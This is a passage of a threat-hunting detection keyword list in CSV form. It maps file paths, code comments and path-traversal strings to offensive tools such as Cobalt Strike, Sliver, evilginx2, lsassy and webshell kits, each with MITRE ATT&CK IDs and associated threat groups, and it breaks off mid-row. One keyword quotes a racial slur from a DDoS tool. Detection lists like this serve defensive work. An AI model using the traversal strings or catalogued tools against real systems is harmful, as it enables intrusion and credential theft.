"*/../../../../../../../../../../../../../../etc/httpd/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4992" "*/../../../../../../../../../../../../../../usr/apache/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/apache\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4993" "*/../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4994" "*/../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/local\/etc\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4995" "*/../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/local\/etc\/httpd\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4996" "*/../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/opt\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4997" "*/../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/private\/etc\/httpd\/httpd\.conf\.default.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4998" "*/../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/private\/etc\/httpd\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4999" "*/../../../../../boot.ini*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/boot\.ini.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","5000" "*/.ACEshark*",".{0,1000}\/\.ACEshark.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","5001" "*/.aggressor.prop*",".{0,1000}\/\.aggressor\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","5002" "*/.antproxy.php*",".{0,1000}\/\.antproxy\.php.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5003" "*/.clone.dll*",".{0,1000}\/\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","5009" "*/.cme/cme.conf*",".{0,1000}\/\.cme\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5010" "*/.config/lsassy*",".{0,1000}\/\.config\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","5011" "*/.dns2tcprc*",".{0,1000}\/\.dns2tcprc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","5012" "*/.evilginx/*",".{0,1000}\/\.evilginx\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","5013" "*/.exegol/*",".{0,1000}\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5014" "*/.gspy/databases/*",".{0,1000}\/\.gspy\/databases\/.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#linux","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","5016" "*/.gtunnel.conf*",".{0,1000}\/\.gtunnel\.conf.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#linux","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","5017" "*/.link/3rdparty/SharpCollection*",".{0,1000}\/\.link\/3rdparty\/SharpCollection.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","5018" "*/.local/bin/graphspy*",".{0,1000}\/\.local\/bin\/graphspy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 
with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#linux","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","5019" "*/.local/share/pacu/*",".{0,1000}\/\.local\/share\/pacu\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5020" "*/.localxpose/.access*",".{0,1000}\/\.localxpose\/\.access.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","#linux","N/A","10","","N/A","","","","5021" "*/.manspider/logs*",".{0,1000}\/\.manspider\/logs.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","5023" "*/.manspider/loot*",".{0,1000}\/\.manspider\/loot.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","5024" "*/.MOONWALK*",".{0,1000}\/\.MOONWALK.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","5025" "*/.msf4/*",".{0,1000}\/\.msf4\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5026" "*/.ntdissector*",".{0,1000}\/\.ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","5027" "*/.nxc/obfuscated_scripts/*",".{0,1000}\/\.nxc\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5028" "*/.powerview/.powerview_history*",".{0,1000}\/\.powerview\/\.powerview_history.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#linux","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","5029" "*/.powerview/logs*",".{0,1000}\/\.powerview\/logs.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#linux","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","5030" "*/.proxychains/*",".{0,1000}\/\.proxychains\/.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense 
Evasion","https://github.com/haad/proxychains","1","0","#linux","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","5031" "*/.sliver/logs*",".{0,1000}\/\.sliver\/logs.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5032" "*/.sliver-client/*",".{0,1000}\/\.sliver\-client\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5033" "*/.sliver-client/configs*",".{0,1000}\/\.sliver\-client\/configs.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5034" "*/.spraycharles/logs*",".{0,1000}\/\.spraycharles\/logs.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","5035" "*/.spraycharles/out*",".{0,1000}\/\.spraycharles\/out.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","5036" "*/.spraycharles:/root/.spraycharles*",".{0,1000}\/\.spraycharles\:\/root\/\.spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","5037" "*/.ssh/RAI.pub*",".{0,1000}\/\.ssh\/RAI\.pub.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5039" "*/.wpscan/*",".{0,1000}\/\.wpscan\/.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","0","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","5042" "*// A: the Meterpreter stage is a large shellcode *",".{0,1000}\/\/\sA\:\sthe\sMeterpreter\sstage\sis\sa\slarge\sshellcode\s.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/Karkas66/CelestialSpark","1","0","#content","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","5045" "*// Define IP Adress of your C2 Stager 
(!)*",".{0,1000}\/\/\sDefine\sIP\sAdress\sof\syour\sC2\sStager\s\(!\).{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#content","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","5046" "*// Discord C2*",".{0,1000}\/\/\sDiscord\sC2.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","#content","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","5047" "*// Malicious payload should be implemented here*",".{0,1000}\/\/\sMalicious\spayload\sshould\sbe\simplemented\shere.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","#content","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","5048" "*// William Moody*",".{0,1000}\/\/\sWilliam\sMoody.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","#content","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","5051" "*//:ptth*",".{0,1000}\/\/\:ptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5052" 
"*//:sptth""[::-1]*",".{0,1000}\/\/\:sptth\""\[\:\:\-1\].{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","5053" "*//:sptth*",".{0,1000}\/\/\:sptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5054" "*//Don't Recode & Decrypt it Niggas*",".{0,1000}\/\/Don\'t\sRecode\s\&\sDecrypt\sit\sNiggas.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","5055" "*//Lh0St/InJ3C*",".{0,1000}\/\/Lh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","5056" "*//localhost:1337*",".{0,1000}\/\/localhost\:1337.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","5057" "*//MegaMedusa-DDoS-Machine*",".{0,1000}\/\/MegaMedusa\-DDoS\-Machine.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","5058" "*//RRh0St/InJ3C*",".{0,1000}\/\/RRh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource 
